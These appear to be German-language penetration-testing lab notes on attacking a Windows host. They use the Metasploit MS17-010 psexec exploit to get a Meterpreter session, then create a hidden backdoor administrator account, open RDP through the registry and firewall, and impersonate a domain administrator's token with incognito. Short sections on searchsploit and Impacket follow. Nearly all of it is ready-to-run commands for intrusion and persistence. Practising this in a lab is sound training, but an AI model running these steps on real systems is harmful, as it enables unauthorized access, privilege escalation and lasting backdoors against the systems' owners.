Create a Backdoor User

Meterpreter zum Ziel starten

You will now use the PsExec exploit

use exploit/windows/smb/ms17_010_psexec
  set RHOST 192.168.0.5
  set SMBUser admin
  set SMBPass Passw0rd
run

User mit Berechtigung anlegen

Meterpreter ist gestartet, wir können beginnen

meterpreter > shell  # auf windows eine Shell öffnen (cmd)
c:\windows\system32> net user plab Passw0rd /add  #auf Windows den User plab mit PW Passw0rd anlegen
net localgroup administrators plab /add   # User plab zum Admin machen
net localgroup "Remote Desktop Users" plab /add  # plab zur Gruppe Remote Desktop Users hinzufügen

RDP in der Firewall etablieren

netsh firewall set service RemoteDesktop enable

Achtung: der Befehl firewall wird ersetzt

IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v DenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f

Jetzt können wir den Remote Desktop service auf autostart setzten und starten

sc config TermService start= auto
net start Termservice

Es wird Zeit eine netshell zu starten und in die Firewall-Shell zu gehen

netsh.exe
netsh> firewall

Wir öffnen Port 3389 TCP für RDP

add portopening TCP 3389 "Remote Desktop"

Soweit fertig. Die Firewall-Shell kann mit exit wieder geschlossen werden. Auch die CMD mit exit schließen. Wir sind wieder im Meterpreter

Enable Remote Desktop using Meterpreter

wir brauchen wieder eine offene Meterpreter-Session zum Zielsystem (siehe oben). Datim können wir RDP starten

run post/windows/manage/enable_rdp

Use the Incognito Module

Token in Windows ähneln den Cookies in Webanwendungen. Es gibt zwei Arten von Token:

Delegate: Werden erstellt, wenn Sie sich bei einem System anmelden. Diese werden auch erstellt, wenn Sie sich über Remote Desktop mit einem System verbinden.
Impersonate: Werden für eine nicht interaktive Sitzung erstellt, z. B. zum Herstellen einer Verbindung mit einem Netzlaufwerk.

Inkognito werden und die vorhandenen Token ansehen

use incognito
list_tokens -u

Um die Privilegien von PRACTICELABS\Administrator zu erlangen, müssen wir das Token imitieren.

impersonate_token PRACTICELABS\\Administrator  # achte auf die doppelten \\

die User-ID ausgeben und Berechtigung prüfen

 getuid

jetzt können wir als Admin versteckt arbeiten, eine cmd starten und testen wer wir sind

execute -f cmd.exe -i -t  # startet eine versteckte cmd
whoami

mit exe beenden wir die Session und fallen zurück zu Meterpreter. Das Aufräumen nicht vergessen. mit

rev2self

stellen wir den alten Token wieder her. (prüfe mit getuid)

Searchsploit

searchsploit wurde entwickelt, um die lokale Exploit-Datenbank zu durchsuchen. Dieses Tool ist praktisch, wenn Sie keine Internetverbindung haben und nach Exploits suchen müssen. Wenn jedoch die Exploit-Datenbank nicht aktualisiert wird, erhalten Sie möglicherweise nicht die Exploit-Informationen, nach denen Sie gesucht haben. Sie können eine Suche anhand des Titels durchführen und sogar einen Exploit untersuchen.
Dafür starten wir in Kali eine neue Shell und updaten die DB von Searchsploit

searchsploit -u

Mit einer frischen Datenbank können wir nach beliebigen Exploits suchen

searchsploit MS17-010                               # sucht nach explizitem Exploit
searchsploit -t windows remote                      # sucht alle Windows remote Exploits
searchsploit -m 39166                               # kopiert 39166 in den Ordner /root/
searchsploit 39166 --examine                        # untersucht ein Exploit
searchsploit Windows iis -w                         # zeigt Update-Informationen an
searchsploit --exclude=Windows                      # schließt alle Treffer mit "Windows" aus
searchsploit windows | grep “Privilege Escalation”  # greppen kann man auch
searchsploit -c XSS                                 # case-sensitive Suche

Impacket

Impacket ist eine Reihe von Python-Skripten, mit denen Sie eine ganze Reihe von Informationen aus einem System abrufen können. Es enthält mehrere vorgefertigte Skripte, die wie folgt kategorisiert sind:

Remotecodeausführung	atexec.py, dcomexec.py, psexec.py, smbexec.py, wmiexec.py
SMB/MSRPC	getArch.py, ifmap.py, lookupsid.py, samrdump.py, services.py, netview.py, smbclient.py, opdump.py, rpcdump.py, reg.py
Kerberos	GetST.py, GetPac.py, GetUserSPNs.py, GetNPUsers.py, ticketer.py, raiseChild.py
Windows-Secret	mimikatz.py
Server-Tools/MiTM-Angriffe	karmaSMB.py, smbserver.py
Windows-Verwaltungsinstrumentation (WMI)	wmipersist.py
SAMBA	sambaPipe.py, sambaPipe.py
MSSQL	mssqlclient.py
Dateiformate	ntfs-read.py, Registry-read.py
Verschiedenes	mqtt_check.py, rdp_check.py, sniffer.py, ping.py, ping6.py

Dazu wird zuerst python installiert

python setup.py install

Dann zum Ordner examples springen. Darin sind alle *.py-Dateien enthalten. Eine Beschreibung der Apps findet man im Netz :)